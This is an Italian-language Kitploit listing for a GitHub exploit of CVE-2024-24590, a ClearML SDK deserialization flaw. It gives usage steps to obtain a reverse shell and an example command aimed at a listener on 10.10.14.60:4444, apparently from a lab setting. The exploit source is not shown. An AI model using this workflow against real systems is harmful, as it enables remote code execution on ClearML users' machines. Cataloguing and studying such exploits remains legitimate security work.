Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-24590 — La deserializzazione di dati non attendibili può verificarsi nelle versioni 0.17.0 fino alla 1.14.2 dell'SDK client della piattaforma ClearML di Allegro AI, permettendo a un artefatto caricato in modo malevolo di eseguire codice arbitrario sul sistema di un utente finale quando si interagisce con esso. | Kitploit
Strumenti/GitHubGitHub/junnythemarksman/cve-2024-24590
Generazione di PayloadAnalisi delle VulnerabilitàExploitPenetration TestingSicurezza della Supply ChainStrumento di Accesso Remoto
GitHubjunnythemarksman/cve-2024-24590

CVE-2024-24590

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
1122 anni faNon ancora revisionato

Informazioni

La deserializzazione di dati non attendibili può verificarsi nelle versioni 0.17.0 fino alla 1.14.2 dell'SDK client della piattaforma ClearML di Allegro AI, permettendo a un artefatto caricato in modo malevolo di eseguire codice arbitrario sul sistema di un utente finale quando si interagisce con esso.

Condividi

CVE-2024-24590

La deserializzazione di dati non fidati può verificarsi nelle versioni da 0.17.0 a 1.14.2 dell'SDK client della piattaforma ClearML di Allegro AI, consentendo a un artefatto caricato malevolmente di eseguire codice arbitrario sul sistema di un utente finale quando viene interagito.

Utilizzo

  1. incolla le credenziali fornite ed esegui clearml-init
  2. esegui lo script Python exploit.py in un terminale e tieni un listener in un altro terminale
  3. potrebbe essere necessario eseguire l'exploit molte volte per ottenere una reverse shell
root@kitploit:~
usage: exploit.py [-h] -i IP -p PORT -P PROJECT

options:
  -h, --help  show this help message and exit
  -i IP       IP address of the listener
  -p PORT     Port number of the listener
  -P PROJECT  Name of the existing project

example: python exploit.py -i 10.10.14.60 -p 4444 -P 'Black Swan'

Dettagli dell'exploit

  1. https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/
  2. https://www.cvedetails.com/cve/CVE-2024-24590/
Scarica lo strumento